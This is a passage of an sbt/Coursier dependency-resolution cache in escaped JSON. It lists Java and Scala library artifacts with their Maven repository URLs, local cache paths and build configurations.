[],\"callers\":[]},{\"module\":{\"organization\":\"javax.annotation\",\"name\":\"jsr250-api\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jsr250-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://jcp.org/aboutJava/communityprocess/final/jsr250/index.html\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-analysis\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-analysis\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.enterprise\",\"name\":\"cdi-api\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"cdi-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.commons\",\"name\":\"commons-lang3\",\"revision\":\"3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"commons-lang3\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://commons.apache.org/proper/commons-lang/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-model\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-model\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-commons\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-commons\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.ant\",\"name\":\"ant-launcher\",\"revision\":\"1.9.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ant-launcher\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://ant.apache.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-reflect\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-reflect\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-tree\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-tree\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.eclipse.sisu\",\"name\":\"org.eclipse.sisu.inject\",\"revision\":\"0.3.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"org.eclipse.sisu.inject\",\"type\":\"eclipse-plugin\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.eclipse.sisu\",\"name\":\"org.eclipse.sisu.plexus\",\"revision\":\"0.3.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"org.eclipse.sisu.plexus\",\"type\":\"eclipse-plugin\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.pantsbuild\",\"name\":\"jarjar\",\"revision\":\"1.7.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jarjar\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/pantsbuild/jarjar\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-component-annotations\",\"revision\":\"1.5.5\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-component-annotations\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-classworlds\",\"revision\":\"2.5.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-classworlds\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scalactic\",\"name\":\"scalactic_2.12\",\"revision\":\"3.0.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalactic_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scalatest.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-utils\",\"revision\":\"3.0.22\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-utils\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://plexus.codehaus.org/plexus-utils\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sbt-assembly\",\"revision\":\"0.14.10\",\"configurations\":\"compile\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sbt-assembly\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar\",\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar\"]],\"missingArtifacts\":[],\"publicationDate\":\"2019-08-06T10:52:23+08:00\",\"evicted\":false,\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"configurations\":[{\"name\":\"pom\"},{\"name\":\"test\"},{\"name\":\"provided\"},{\"name\":\"docs\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"sources\"},{\"name\":\"runtime\"}],\"licenses\":[[\"MIT License\",\"https://github.com/sbt/sbt-assembly/blob/master/LICENSE\"]],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-library\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-library\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]}],\"details\":[]},{\"configuration\":{\"name\":\"provided\"},\"modules\":[{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"test-interface\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"test-interface\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/test-interface/1.0/test-interface-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-interface/1.0/test-interface-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scala-sbt.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.typesafe\",\"name\":\"ssl-config-core_2.12\",\"revision\":\"0.4.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ssl-config-core_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/typesafe/ssl-config-core_2.12/0.4.0/ssl-config-core_2.12-0.4.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/ssl-config-core_2.12/0.4.0/ssl-config-core_2.12-0.4.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lightbend/ssl-config\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"io_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"io_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/io_2.12/1.3.3/io_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/io_2.12/1.3.3/io_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/io\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"main_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"main_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/main_2.12/1.3.8/main_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main_2.12/1.3.8/main_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.trueaccord.lenses\",\"name\":\"lenses_2.12\",\"revision\":\"0.4.12\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"lenses_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/trueaccord/lenses/lenses_2.12/0.4.12/lenses_2.12-0.4.12.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/lenses/lenses_2.12/0.4.12/lenses_2.12-0.4.12.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/trueaccord/lenses\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"command_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"command_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/command_2.12/1.3.8/command_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/command_2.12/1.3.8/command_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.github.ben-manes.caffeine\",\"name\":\"caffeine\",\"revision\":\"2.5.6\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"caffeine\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/github/ben-manes/caffeine/caffeine/2.5.6/caffeine-2.5.6.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/ben-manes/caffeine/caffeine/2.5.6/caffeine-2.5.6.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/ben-manes/caffeine\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"task-system_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"nam